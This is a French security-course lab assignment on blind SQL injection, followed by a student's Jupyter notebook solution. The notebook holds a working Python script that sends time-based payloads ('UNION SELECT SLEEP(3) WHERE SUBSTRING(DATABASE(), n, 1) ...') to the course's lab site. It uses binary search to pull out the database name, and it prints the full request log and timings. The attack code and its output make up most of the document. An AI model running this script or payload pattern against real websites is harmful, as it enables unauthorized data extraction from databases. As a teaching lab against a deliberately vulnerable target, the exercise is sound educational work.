# ipl I317B Sécurité : labos
## Projet 1 : exploitation SQL à l'aveugle

Pour ce premier projet (qui originellement était le dernier exercice de la semaine 3), vous allez procéder à des injections à l'aveugle. En effet, la page suicitant notre intérêt pour ce projet ne contient pas grand chose à part un bouton ... mais elle est injectable (promis) !

http://labosecuipl.alwaysdata.net/20/s03/ex2/


Cette fois-ci, le moteur de base de donnée présent derrière ce site n'est plus du sqlite mais du MariaDB. Votre objectif pour ce projet est de récupérer le nom de la base de donnée.

1. Premièrement, vous devrez analyser ce site pour trouver où faire votre injection. Comme l'indique le nom de ce projet, votre injection sera à l'aveugle, vous ne devez donc pas vous attendre à percevoir le moindre résultat pour celle-ci, aucune valeur présente sur le site ne dépend de la réusite de votre injection (par exemple: oui, la couleur du titre est *vraiment* aléatoire).  
   Pour vous aider dans votre démarche, voici quelques *gros* indices :
  - MariaDB dispose d'une fonction sleep ( https://mariadb.com/kb/en/sleep/ ) qui va faire "dormir" le code un certain nombre de seconde. La base de donnée mettra donc plus de temps avant de retourner un résultat.
  - SQL, comme d'autres langages, fait une évaluation paresseuse (lazy) des conditions. Celles-ci sont évaluée de gauche à droite et si la logique booleen le permet, les parties inutiles sont ignorées.  
    > L'exemple suivant est en python mais le comportement SQL est le même :
    > - `if False and 1/0:` ne créera pas d'exception malgré la présence d'une division par zéro.
    > - `if True and 1/0:` créera une exception `ZeroDivisionError`.
    >  
    > En effet, dans le premier cas, le résultat de `Faux ET ?` sera toujours faux ([logique booléen](https://fr.wikipedia.org/wiki/Alg%C3%A8bre_de_Boole_(logique)#Conjonction)), il n'est donc pas nécessaire d'évaluer la suite de l'expression et python ne "voit" donc même pas la division par zéro.
    > 
    > Dans la deuxième expression `True ET ?`, toute l'expression dépend de ce qui se trouve après le `ET` et donc la suite de l'expression doit être évaluée.

2. Une fois l'injection trouvée et fonctionnelle, vous devrez coder un programme qui recherchera le nom de la base de donnée (voir: https://mariadb.com/kb/en/database/ ).  
   Au vue du type d'attaque que vous allez mener (ralenti par les `sleep`) et le nombre d'étudiant (pauvre serveur), je vous demande de coder intelligemment :
  - Un des buts évalué de ce projet est de réduire le nombre de requêtes nécessaire pour obtenir le résultat par exemple avec une [recherche dichotomique](https://fr.wikipedia.org/wiki/Recherche_dichotomique).
  - Un temps de sleep entre 2 et 5 secondes devrait être suffisant dans la majorité des cas (à moins que vous n'ayez une connection internet particulièrement instable).
  - (...)

  Afin d'aiguiller votre recherche, nous partons du postula que le nom de la base de donnée à trouver ne comprend que des charactères repris dans `[a-z0-9]` ainsi que le tiret `-` et le tiret du bas `_`. (Attention le tiret du bas à une [valeur particulière](https://www.w3schools.com/sql/sql_wildcards.asp) dans le `LIKE` sql.)
3. En plus du code du point précédent, vous rédigerez quelques lignes de texte pour décrire :
  - la localisation de la vulnérabilité et la requête SQL supposée derrière (La question classique "Qu'est-ce qui tourne derrière ?").
  - le format de votre injection.
  - d'éventuelles difficultées rencontrer pendant ce projet.
  
  Ce texte peut être présenté dans une cellule de type Markdown de votre jupyter notebook.

Le format de remise préféré est un jupyter notebook mais vous pouvez également fournir un fichier "*.py*" plus un *pdf* pour la partie textuelle.

La date de remise sur moodle est le dimanche 25 octobre à 23H59.

...

labosecuipl

In [1]:
import requests
import time

In [2]:
"""
Fait une requete post pour voir si le caractère est {=, > ,<} au caractère dans la base de donnée à la position donnée
"""
def requestPost(caractere, position, comparateur):
    timeBeforeRequest = time.time()
    sqli = " '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), %s, 1) %s '%s' ;--" %(
        position, comparateur, caractere)
    print(sqli)
    page = requests.post(
        "http://labosecuipl.alwaysdata.net/20/s03/ex2/",
        data={
            "id": sqli}
    )
    timeAfterRequest = time.time()
    print(timeAfterRequest - timeBeforeRequest)
    if (timeAfterRequest - timeBeforeRequest > 3):
        return True
    else:
        return False
    
#requestPost('l', str(1), '=')

In [3]:
"""
Renvoie la position; 'a' représente le début de la liste et 'b' la fin de la liste, 'm' le milieu
"""
def recherche_dichotomique(liste_de_donnee, position, a, b):
    if b >= a:
        m = (a+b)//2
        print(m)
        print("traitement de : " + liste_de_donnee[m])
        if (requestPost(liste_de_donnee[m], position, '=')):
            return m
        elif (requestPost(liste_de_donnee[m], position, '<')): # le char est plus grand
            return recherche_dichotomique(liste_de_donnee, position, a, m-1)
        #elif (requestPost(liste_de_donnee[m], position, '>')):
        else:
            return recherche_dichotomique(liste_de_donnee, position, m+1, b)
    else:
        return -1

In [4]:
# du plus petit char au plus grand
dictionnaire = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f',
                'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'x', 'w',
                'y', 'z', '-', '_']
resultat = ""
position = 1

debut = time.time()
while 1:
    res = recherche_dichotomique(dictionnaire, str(position), 0, len(dictionnaire)-1)
    if (res != -1):
        print(res)
        resultat += dictionnaire[res]
        position += 1
        print(resultat)
    else:
        break

fin = time.time()
print(resultat)
print("temps mis: ")
print(fin - debut)

18
traitement de : i
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 1, 1) = 'i' ;--
0.3867225646972656
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 1, 1) < 'i' ;--
0.18363571166992188
28
traitement de : s
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 1, 1) = 's' ;--
0.0846552848815918
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 1, 1) < 's' ;--
3.241088390350342
23
traitement de : n
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 1, 1) = 'n' ;--
0.3485686779022217
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 1, 1) < 'n' ;--
3.0867905616760254
20
traitement de : k
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 1, 1) = 'k' ;--
0.09084534645080566
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 1, 1) < 'k' ;--
0.11161589622497559
21
traitement de : l
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 1, 1) = 'l' ;--
3.427629232406616
21
l
18
traitement de : i
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 2, 1) = 'i' ;--
0.09865975379943848
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 2, 1) < 'i' ;--
3.1105706691741943
8
traitement de : 8
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 2, 1) = '8' ;--
0.1093754768371582
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 2, 1) < '8' ;--
0.11816692352294922
13
traitement de : d
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 2, 1) = 'd' ;--
0.11467862129211426
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 2, 1) < 'd' ;--
3.1772215366363525
10
traitement de : a
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 2, 1) = 'a' ;--
3.3028688430786133
10
la
18
traitement de : i
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 3, 1) = 'i' ;--
0.20438289642333984
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 3, 1) < 'i' ;--
3.4013335704803467
8
traitement de : 8
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 3, 1) = '8' ;--
0.08476591110229492
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 3, 1) < '8' ;--
0.0818488597869873
13
traitement de : d
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 3, 1) = 'd' ;--
0.08083295822143555
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 3, 1) < 'd' ;--
3.0820131301879883
10
traitement de : a
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 3, 1) = 'a' ;--
0.07579231262207031
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 3, 1) < 'a' ;--
0.08407258987426758
11
traitement de : b
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 3, 1) = 'b' ;--
3.0818111896514893
11
lab
18
traitement de : i
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 4, 1) = 'i' ;--
0.07601737976074219
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 4, 1) < 'i' ;--
0.08780622482299805
28
traitement de : s
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 4, 1) = 's' ;--
0.08495163917541504
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 4, 1) < 's' ;--
3.087665557861328
23
traitement de : n
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 4, 1) = 'n' ;--
0.06940555572509766
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 4, 1) < 'n' ;--
0.07411336898803711
25
traitement de : p
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 4, 1) = 'p' ;--
0.07735157012939453
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 4, 1) < 'p' ;--
3.3366124629974365
24
traitement de : o
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 4, 1) = 'o' ;--
3.1961305141448975
24
labo
18
traitement de : i
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 5, 1) = 'i' ;--
0.1059885025024414
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 5, 1) < 'i' ;--
0.08106184005737305
28
traitement de : s
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 5, 1) = 's' ;--
3.099430561065674
28
labos
18
traitement de : i
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 6, 1) = 'i' ;--
0.09198880195617676
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 6, 1) < 'i' ;--
3.269474744796753
8
traitement de : 8
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 6, 1) = '8' ;--
0.16305780410766602
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 6, 1) < '8' ;--
0.12403416633605957
13
traitement de : d
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 6, 1) = 'd' ;--
0.11494135856628418
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 6, 1) < 'd' ;--
0.09234261512756348
15
traitement de : f
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 6, 1) = 'f' ;--
0.1207125186920166
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 6, 1) < 'f' ;--
3.199249744415283
14
traitement de : e
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 6, 1) = 'e' ;--
3.182255268096924
14
labose
18
traitement de : i
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 7, 1) = 'i' ;--
0.0744791030883789
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 7, 1) < 'i' ;--
3.128481149673462
8
traitement de : 8
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 7, 1) = '8' ;--
0.08342361450195312
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 7, 1) < '8' ;--
0.08089280128479004
13
traitement de : d
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 7, 1) = 'd' ;--
0.10034322738647461
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 7, 1) < 'd' ;--
3.1402108669281006
10
traitement de : a
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 7, 1) = 'a' ;--
0.14017057418823242
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 7, 1) < 'a' ;--
0.0733029842376709
11
traitement de : b
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 7, 1) = 'b' ;--
0.0868678092956543
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 7, 1) < 'b' ;--
0.09005117416381836
12
traitement de : c
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 7, 1) = 'c' ;--
3.093445301055908
12
labosec
18
traitement de : i
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 8, 1) = 'i' ;--
0.07837986946105957
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 8, 1) < 'i' ;--
0.3119211196899414
28
traitement de : s
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 8, 1) = 's' ;--
0.1081399917602539
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 8, 1) < 's' ;--
0.1200876235961914
33
traitement de : w
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 8, 1) = 'w' ;--
0.10255551338195801
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 8, 1) < 'w' ;--
3.1298418045043945
30
traitement de : u
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 8, 1) = 'u' ;--
3.3173909187316895
30
labosecu
18
traitement de : i
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 9, 1) = 'i' ;--
3.2216804027557373
18
labosecui
18
traitement de : i
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 10, 1) = 'i' ;--
0.08241128921508789
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 10, 1) < 'i' ;--
0.07542705535888672
28
traitement de : s
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 10, 1) = 's' ;--
0.08179068565368652
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 10, 1) < 's' ;--
3.11279296875
23
traitement de : n
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 10, 1) = 'n' ;--
0.1327359676361084
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 10, 1) < 'n' ;--
0.09351801872253418
25
traitement de : p
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 10, 1) = 'p' ;--
3.0918922424316406
25
labosecuip
18
traitement de : i
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 11, 1) = 'i' ;--
0.13007307052612305
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 11, 1) < 'i' ;--
0.09160447120666504
28
traitement de : s
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 11, 1) = 's' ;--
0.08298563957214355
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 11, 1) < 's' ;--
3.0907485485076904
23
traitement de : n
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 11, 1) = 'n' ;--
0.08933305740356445
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 11, 1) < 'n' ;--
3.2070460319519043
20
traitement de : k
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 11, 1) = 'k' ;--
1.2898435592651367
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 11, 1) < 'k' ;--
0.08346796035766602
21
traitement de : l
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 11, 1) = 'l' ;--

3.083033323287964
21
labosecuipl
18
traitement de : i
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 12, 1) = 'i' ;--
0.6664752960205078
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 12, 1) < 'i' ;--
0.1137843132019043
28
traitement de : s
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 12, 1) = 's' ;--
0.2156996726989746
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 12, 1) < 's' ;--
0.09542036056518555
33
traitement de : w
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 12, 1) = 'w' ;--
0.09689617156982422
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 12, 1) < 'w' ;--
0.08171534538269043
35
traitement de : z
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 12, 1) = 'z' ;--
0.08360409736633301
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 12, 1) < 'z' ;--
0.0997772216796875
36
traitement de : -
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 12, 1) = '-' ;--
0.1061553955078125
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 12, 1) < '-' ;--
0.08532142639160156
37
traitement de : _
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 12, 1) = '_' ;--
3.13140869140625
37
labosecuipl_
18
traitement de : i
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 13, 1) = 'i' ;--
0.08459711074829102
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 13, 1) < 'i' ;--
0.1158447265625
28
traitement de : s
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 13, 1) = 's' ;--
0.08124327659606934
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 13, 1) < 's' ;--
3.181575298309326
23
traitement de : n
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 13, 1) = 'n' ;--
0.11467266082763672
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 13, 1) < 'n' ;--
0.10626721382141113
25
traitement de : p
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 13, 1) = 'p' ;--
3.139443874359131
25
labosecuipl_p
18
traitement de : i
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 14, 1) = 'i' ;--
0.09146571159362793
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 14, 1) < 'i' ;--
3.0986242294311523
8
traitement de : 8
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 14, 1) = '8' ;--
0.3857402801513672
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 14, 1) < '8' ;--
3.1066555976867676
3
traitement de : 3
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 14, 1) = '3' ;--
0.11294770240783691
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 14, 1) < '3' ;--
3.088585376739502
1
traitement de : 1
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 14, 1) = '1' ;--
0.07900047302246094
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 14, 1) < '1' ;--
3.2481887340545654
0
traitement de : 0
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 14, 1) = '0' ;--
3.1095564365386963
0
labosecuipl_p0
18
traitement de : i
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 15, 1) = 'i' ;--
0.08208227157592773
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 15, 1) < 'i' ;--
3.0827343463897705
8
traitement de : 8
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 15, 1) = '8' ;--
0.08778786659240723
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 15, 1) < '8' ;--
3.301051139831543
3
traitement de : 3
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 15, 1) = '3' ;--
0.3745856285095215
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 15, 1) < '3' ;--
3.1291816234588623
1
traitement de : 1
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 15, 1) = '1' ;--
3.1218464374542236
1
labosecuipl_p01
18
traitement de : i
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 16, 1) = 'i' ;--
0.10470867156982422
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 16, 1) < 'i' ;--
0.08268070220947266
28
traitement de : s
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 16, 1) = 's' ;--
0.14052605628967285
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 16, 1) < 's' ;--
0.11502361297607422
33
traitement de : w
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 16, 1) = 'w' ;--
0.08268880844116211
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 16, 1) < 'w' ;--
0.08663654327392578
35
traitement de : z
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 16, 1) = 'z' ;--
0.07404184341430664
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 16, 1) < 'z' ;--
0.0808718204498291
36
traitement de : -
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 16, 1) = '-' ;--
0.11373162269592285
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 16, 1) < '-' ;--
0.10974335670471191
37
traitement de : _
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 16, 1) = '_' ;--
3.345686674118042
37
labosecuipl_p01_
18
traitement de : i
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 17, 1) = 'i' ;--
0.1548612117767334
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 17, 1) < 'i' ;--
3.0861644744873047
8
traitement de : 8
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 17, 1) = '8' ;--
0.548799991607666
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 17, 1) < '8' ;--
0.4187467098236084
13
traitement de : d
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 17, 1) = 'd' ;--
0.18814325332641602
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 17, 1) < 'd' ;--
3.335747718811035
10
traitement de : a
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 17, 1) = 'a' ;--
0.09507513046264648
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 17, 1) < 'a' ;--
0.10995769500732422
11
traitement de : b
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 17, 1) = 'b' ;--
3.1767585277557373
11
labosecuipl_p01_b
18
traitement de : i
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 18, 1) = 'i' ;--
0.14170002937316895
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 18, 1) < 'i' ;--
0.43431854248046875
28
traitement de : s
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 18, 1) = 's' ;--
0.10658884048461914
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 18, 1) < 's' ;--
3.0841994285583496
23
traitement de : n
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 18, 1) = 'n' ;--
0.07404661178588867
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 18, 1) < 'n' ;--
3.082413911819458
20
traitement de : k
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 18, 1) = 'k' ;--
0.11850714683532715
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 18, 1) < 'k' ;--
0.1162261962890625
21
traitement de : l
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 18, 1) = 'l' ;--
3.2531681060791016
21
labosecuipl_p01_bl
18
traitement de : i
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 19, 1) = 'i' ;--
3.2394630908966064
18
labosecuipl_p01_bli
18
traitement de : i
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 20, 1) = 'i' ;--
0.17571711540222168
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 20, 1) < 'i' ;--
0.7084977626800537
28
traitement de : s
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 20, 1) = 's' ;--
0.16312265396118164
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 20, 1) < 's' ;--
3.26204514503479
23
traitement de : n
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 20, 1) = 'n' ;--
3.2351577281951904
23
labosecuipl_p01_blin
18
traitement de : i
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 21, 1) = 'i' ;--
0.10334300994873047
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 21, 1) < 'i' ;--
3.107897996902466
8
traitement de : 8
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 21, 1) = '8' ;--
0.07562017440795898
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 21, 1) < '8' ;--
0.0948171615600586
13
traitement de : d
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 21, 1) = 'd' ;--
3.0821692943573
13
labosecuipl_p01_blind
18
traitement de : i
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 22, 1) = 'i' ;--
0.07197141647338867
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 22, 1) < 'i' ;--
3.076712131500244
8
traitement de : 8
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 22, 1) = '8' ;--
0.08806610107421875
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 22, 1) < '8' ;--
3.0784032344818115
3
traitement de : 3
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 22, 1) = '3' ;--
0.0821223258972168
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 22, 1) < '3' ;--

3.1272130012512207
1
traitement de : 1
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 22, 1) = '1' ;--
0.10764861106872559
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 22, 1) < '1' ;--
3.1622707843780518
0
traitement de : 0
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 22, 1) = '0' ;--
0.34253883361816406
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 22, 1) < '0' ;--
3.1459178924560547
labosecuipl_p01_blind
temps mis:
193.81755089759827

SELECT <'champ'> FROM <'table_name'> WHERE id = '<id>' --> Comme l'id n'est pas un string il ne faut pas fermer les quotes ''. ce n'est pas ça where id = '<id>' mais plus ça where id = <id>.

SELECT DATABASE() permet de récupérer le nom de la base de donnée mais comme sur le site il n'y a pas de retour on ne peut pas recevoir le résultat. Le but étant de faire du "brut force" pour que deviner le nom de la table. A chaque fois qu'on devine un caractère on fait endormir la requete grace à sleep(5) si elle s'endort ça veut dire qu'on a trouver un caractère.

Lors de l'injection plusieurs cas peuvent se produire : 
    - le 'code' dort pendant x secondes où x est determiner dans sleep(x). Dans le cas où la condition where est respecté. 
    - le 'code' ne dort pas alors le resultat de la requete est directement envoyer. La condition where n'a pas été respecté. 

Pour voir si le code a dormi ou pas ne manière automatique, il faut utiliser Time. Dans le cas où currentTime - oldTime est plus petit (<) que 5 alors ça veut dire que la requête n'a même pas dormi 5 secondes. Dans le cas contraire elle a dormi 5 secondes. Ce qui veut dire qu'on peut enregistrer le char

Pseudo-code : 

recherche_dichotomique_récursive(liste_triée):
   len = longueur de liste_triée ;
   m = len / 2 ;
   si requestPostEqual(liste_triée[m]) :
       ajouter m au string de résultat et recommencer la recherche dicotomique en changeant la position du caractère;
   si requestPostGreater(liste_triée[m]) :
       renvoyer recherche_dichotomique_récursive(liste_triée[1:m-1]) ; // partie inférieur du tableau
   sinon :
       renvoyer recherche_dichotomique_récursive(liste_triée[m+1:len]) ; // partie supérieur du tableau